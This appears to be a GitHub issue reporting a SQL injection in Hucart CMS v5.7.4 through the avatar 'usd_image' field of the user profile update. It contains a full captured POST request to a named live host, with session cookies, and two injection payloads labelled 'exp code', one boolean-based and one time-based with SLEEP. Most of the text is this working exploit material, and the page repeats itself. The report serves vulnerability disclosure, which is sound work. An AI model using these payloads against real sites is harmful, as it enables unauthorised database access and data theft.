After the user logs in, Hucart cms v5.7.4 does not securely filter the avatar "usd_image" field in the basic information, resulting in a SQL injection vulnerability.
2、The current page capture is as follows:
POST /user/index.php?load=user_info&act=update_user HTTP/1.1
Host: hucart.91dtip.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://hucart.91dtip.com/user/?load=user_info&act=info_list
Content-Type: multipart/form-data; boundary=---------------------------16891966016839
Content-Length: 1574
Connection: close
Cookie: PHPSESSID=v97hmcd0r156989so2rjksqj55; ck_num=169582a799e5b6c46fdfd432379f60d8; bdshare_firstime=1556003682005
Upgrade-Insecure-Requests: 1
3、exp code:
payload1:' WHERE 9707=9707 AND 9427=(SELECT (CASE WHEN (9427=9427) THEN 9427 ELSE (SELECT 3179 UNION SELECT 7232) END))-- CEts
payload2:' WHERE 9733=9733 RLIKE SLEEP(5)-- MHsl
The text was updated successfully, but these errors were encountered:
After the user logs in, Hucart cms v5.7.4 does not securely filter the avatar "usd_image" field in the basic information, resulting in a SQL injection vulnerability.

2、The current page capture is as follows:
POST /user/index.php?load=user_info&act=update_user HTTP/1.1
Host: hucart.91dtip.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://hucart.91dtip.com/user/?load=user_info&act=info_list
Content-Type: multipart/form-data; boundary=---------------------------16891966016839
Content-Length: 1574
Connection: close
Cookie: PHPSESSID=v97hmcd0r156989so2rjksqj55; ck_num=169582a799e5b6c46fdfd432379f60d8; bdshare_firstime=1556003682005
Upgrade-Insecure-Requests: 1
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_nick"
1
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_image"
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_truename"
12
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_birthday"
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_salt"
0
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_msn"
test2@test2.com
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_qq"
1603359461
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_officephone"
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_homephone"
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_tel"
12222222222
-----------------------------16891966016839
Content-Disposition: form-data; name="province"
-----------------------------16891966016839
Content-Disposition: form-data; name="city"
-----------------------------16891966016839
Content-Disposition: form-data; name="district"
-----------------------------16891966016839
Content-Disposition: form-data; name="pcd_all"
-----------------------------16891966016839
Content-Disposition: form-data; name="usd_address"
44
-----------------------------16891966016839--
3、exp code:

payload1:' WHERE 9707=9707 AND 9427=(SELECT (CASE WHEN (9427=9427) THEN 9427 ELSE (SELECT 3179 UNION SELECT 7232) END))-- CEts
payload2:' WHERE 9733=9733 RLIKE SLEEP(5)-- MHsl
The text was updated successfully, but these errors were encountered: